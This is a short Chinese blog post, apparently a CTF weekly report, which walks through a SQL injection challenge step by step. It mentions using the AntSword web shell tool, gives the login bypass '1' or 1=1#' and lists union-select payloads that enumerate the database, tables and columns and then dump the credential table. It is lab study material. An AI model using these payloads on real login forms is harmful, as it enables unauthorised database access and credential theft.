周报23/4/16

 打开题目得到

 明显是可以直接利用蚁剑的

得到 

简单的到文件flag 

 

点开得到题目,直接使用万能密码

1' or 1=1#

 得到

成功登录,然后查看一下url,发现是以get方式进行传参。可以先在username处测试一下有没有注入点:

?username=1' order by 1%23&password=ads

 

直到order by 4的时候,报错了: 

看来有三个字段,开始寻找注入点:

?username=1' union select 1,2,3%23&password=ads

 

 

很明显,2和3都是注入点,而且没有过滤,接下来直接写命令了。

?username=1' union select 1,database(),3%23&password=ads


得到数据库名:geek!

 

?username=1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=ads


得到表名geekuser,l0ve1ysq1

 

?username=1' union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'%23&password=ads


得到字段名id,username,password

 

 

?username=1' union select 1,database(),group_concat(id,username,password) from l0ve1ysq1%23&password=ads


得到flag为:flag{be266ac1-ee01-4910-8cb5-6a4462220676}

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值